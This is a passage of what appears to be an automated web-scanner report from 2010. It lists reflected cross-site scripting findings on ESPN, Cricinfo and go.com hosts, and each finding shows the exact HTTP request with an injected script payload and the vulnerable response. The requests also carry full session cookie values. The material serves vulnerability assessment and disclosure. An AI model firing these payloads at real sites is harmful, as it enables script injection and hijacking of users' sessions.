Host:   http://streak.espn.go.com
Path:   /en/entry

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9d1a<script>alert(1)</script>bc676b3bd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/entryc9d1a<script>alert(1)</script>bc676b3bd41 HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 130
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryc9d1a<script>alert(1)</script>bc676b3bd41</BODY></HTML>

5.131. http://streak.espn.go.com/en/entryStats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/entryStats

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1f44<script>alert(1)</script>648104297fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf1f44<script>alert(1)</script>648104297fd/entryStats HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 138
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf1f44<script>alert(1)</script>648104297fd/entryStats</BODY></HTML>

5.132. http://streak.espn.go.com/en/entryStats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/entryStats

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73792<script>alert(1)</script>b498764bc6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/entryStats73792<script>alert(1)</script>b498764bc6c HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 135
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryStats73792<script>alert(1)</script>b498764bc6c</BODY></HTML>

5.133. http://streak.espn.go.com/en/story [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/story

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f170a<script>alert(1)</script>a531fa92f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf170a<script>alert(1)</script>a531fa92f90/story HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf170a<script>alert(1)</script>a531fa92f90/story</BODY></HTML>

5.134. http://streak.espn.go.com/en/story [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://streak.espn.go.com
Path:   /en/story

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f72f3<script>alert(1)</script>5c58c16e8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/storyf72f3<script>alert(1)</script>5c58c16e8fd HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 130
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/storyf72f3<script>alert(1)</script>5c58c16e8fd</BODY></HTML>

5.135. http://submit.cricinfo.com/ci/content/submit/comment/redirect.html [object_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/comment/redirect.html

Issue detail

The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a682"><script>alert(1)</script>a5ecb98fc96 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ci/content/submit/comment/redirect.html?object_id=4a682"><script>alert(1)</script>a5ecb98fc96 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: submit.cricinfo.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:20 GMT
Server: Apache
Set-Cookie: Q_cricinfo_country=us; path=/; domain=.cricinfo.com
Set-Cookie: Q_cricinfo_cluster=usa; path=/; domain=.cricinfo.com
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1409


<style type="text/css">

#stryFtrLft, #stryFtrRt {
   float:left;
   width:312px;
}
.rltdBlue, .rltdBlue a:link, .rltdBlue a:visited, .rltdBlue a:active {
   color:#0b3766;
   font-size:12px;
   text-decoratio
...[SNIP]...
<a target="_top" href="/ci/content/submit/member_mgmt/user_registration.html?object_id=4a682"><script>alert(1)</script>a5ecb98fc96;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad">
...[SNIP]...

5.136. http://submit.cricinfo.com/ci/content/submit/comment/usr_login.html [object_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/comment/usr_login.html

Issue detail

The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d4a"><script>alert(1)</script>ae55648a8a6 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ci/content/submit/comment/usr_login.html?object_id=51d4a"><script>alert(1)</script>ae55648a8a6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Q_cricinfo_country=us; Q_cricinfo_cluster=usa
Proxy-Connection: Keep-Alive
Host: submit.cricinfo.com

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:20 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1409


<style type="text/css">

#stryFtrLft, #stryFtrRt {
   float:left;
   width:312px;
}
.rltdBlue, .rltdBlue a:link, .rltdBlue a:visited, .rltdBlue a:active {
   color:#0b3766;
   font-size:12px;
   text-decoratio
...[SNIP]...
<a target="_top" href="/ci/content/submit/member_mgmt/user_registration.html?object_id=51d4a"><script>alert(1)</script>ae55648a8a6;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad">
...[SNIP]...

5.137. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2d5"><script>alert(1)</script>b00739a6776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:14:08 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148320
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:08
...[SNIP]...
<input type="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1">
...[SNIP]...

5.138. http://submit.cricinfo.com/ci/content/submit/member_mgmt/user_registration.html [object_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /ci/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cf"><script>alert(1)</script>5ffea527bb5 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:12:39 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148519
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:12:39
...[SNIP]...
="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5">
...[SNIP]...

5.139. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/login_validate.html [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/login_validate.html

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5bb4b<script>alert(1)</script>67896ac1a97 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member_mgmt/content/submit/member_mgmt/login_validate.html?callback=?5bb4b<script>alert(1)</script>67896ac1a97 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:16:50 GMT
Server: Apache
Set-Cookie: CI_Pub_data=; path=/; domain=.cricinfo.com; expires=Sat, 06-Nov-2010 03:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 160
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

?5bb4b<script>alert(1)</script>67896ac1a97
({
"status" : "-1",
"message" : "Invalid email ID/password. Please try again"
})

5.140. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e3a"><script>alert(1)</script>f099b4e3b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:18:36 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148438
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:18:36
...[SNIP]...
<input type="hidden" name="referer" value="/member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1">
...[SNIP]...

5.141. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_registration.html

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6a6"><script>alert(1)</script>dbf3b9311b was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member_mgmt/content/submit/member_mgmt/user_registration.html?sc=masthead9b6a6"><script>alert(1)</script>dbf3b9311b HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:17:04 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 148538
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:17:04
...[SNIP]...
<input type="hidden" name="SourceCategory" value="masthead9b6a6"><script>alert(1)</script>dbf3b9311b">
...[SNIP]...

5.142. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_screenname.html [remember parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://submit.cricinfo.com
Path:   /member_mgmt/content/submit/member_mgmt/user_screenname.html

Issue detail

The value of the remember request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ee"><script>alert(1)</script>3bb15ef92c9 was submitted in the remember parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member_mgmt/content/submit/member_mgmt/user_screenname.html?remember=517ee"><script>alert(1)</script>3bb15ef92c9 HTTP/1.1
Host: submit.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 03:16:53 GMT
Server: Apache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Jan 1985 03:30:00 GMT
Content-Length: 11715
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:16:53
...[SNIP]...
<input type="hidden" name="remember" id="WelcomeScrName" value="517ee"><script>alert(1)</script>3bb15ef92c9">
...[SNIP]...

5.143. http://tredir.go.com/capmon/GetDE [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tredir.go.com
Path:   /capmon/GetDE

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33249<script>alert(1)</script>91aac71b8a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /capmon33249<script>alert(1)</script>91aac71b8a3/GetDE HTTP/1.1
Host: tredir.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
